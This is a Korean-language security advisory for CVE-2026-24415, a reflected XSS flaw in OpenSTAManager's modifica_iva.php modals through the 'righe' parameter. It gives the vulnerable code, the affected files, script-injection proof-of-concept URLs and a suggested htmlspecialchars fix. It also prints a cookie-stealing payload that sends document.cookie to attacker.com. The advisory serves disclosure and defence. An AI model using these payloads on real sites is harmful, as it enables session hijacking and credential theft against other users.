
CVE-2026-24415 - OpenSTAManager가 modifica_iva.php의 righe 매개변수를 통한 XSS의 영향을 받음
| 필드 | 상세 |
|---|
| CVE ID | CVE-2026-24415 |
| 심각도 | MEDIUM |
| 권고 | 권고 보기 |
| 발견자 | Lukasz Rybak |
OpenSTAManager v2.9.8의 여러 반사형 XSS(Cross-Site Scripting) 취약점으로 인해 인증되지 않은 공격자가 조작된 URL 매개변수를 통해 다른 사용자의 브라우저 컨텍스트에서 임의의 JavaScript 코드를 실행할 수 있으며, 이는 세션 하이재킹, 자격 증명 도용 및 무단 작업으로 이어질 수 있습니다.
취약한 매개변수: righe (GET)
OpenSTAManager v2.9.8은 송장/주문/계약 수정 모달에서 여러 반사형 XSS 취약점을 포함하고 있습니다. 애플리케이션은 righe GET 매개변수에서 사용자가 제공한 입력을 HTML 출력에 반영하기 전에 적절히 살균하지 못합니다.
취약한 코드 위치:
파일: /modules/contratti/modals/modifica_iva.php (125번째 줄)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
$_GET['righe'] 매개변수는 htmlspecialchars() 또는 이와 동등한 함수를 사용한 어떠한 살균 없이 HTML value 속성에 직접 출력됩니다. 이를 통해 공격자는 속성 컨텍스트를 벗어나 임의의 HTML/JavaScript를 주입할 수 있습니다.
영향을 받는 모든 파일:
/modules/contratti/modals/modifica_iva.php - 125번째 줄, 167번째 줄/modules/preventivi/modals/modifica_iva.php - 125번째 줄, 167번째 줄/modules/fatture/modals/modifica_iva.php - 121번째 줄, 161번째 줄/modules/ddt/modals/modifica_iva.php - 125번째 줄, 167번째 줄/modules/ordini/modals/modifica_iva.php - 125번째 줄, 167번째 줄/modules/interventi/modals/modifica_iva.php - 125번째 줄, 167번째 줄전제 조건:
1단계: 로그인
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
2단계: XSS 트리거 브라우저에서 다음 URL로 이동하거나 (또는 쿠키와 함께 curl 사용):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
테스트된 URL (모두 취약):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>예상 결과: 현재 세션 쿠키를 표시하는 JavaScript alert 팝업이 나타나 코드 실행을 확인합니다.
HTML 출력 (라이브 인스턴스에서 확인됨):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
확인:


대체 페이로드:
세션 도용: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
영향받는 사용자: 계약, 송장, 견적 또는 주문 모듈에 접근 권한이 있는 모든 인증된 사용자.
공격 시나리오:
권장 수정 사항:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
세부 정보 섹션에 나열된 모든 영향을 받는 파일에 이 수정 사항을 적용하세요.
이 CVE는 조정된 취약점 공개 관행에 따라 책임감 있게 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 제공됩니다.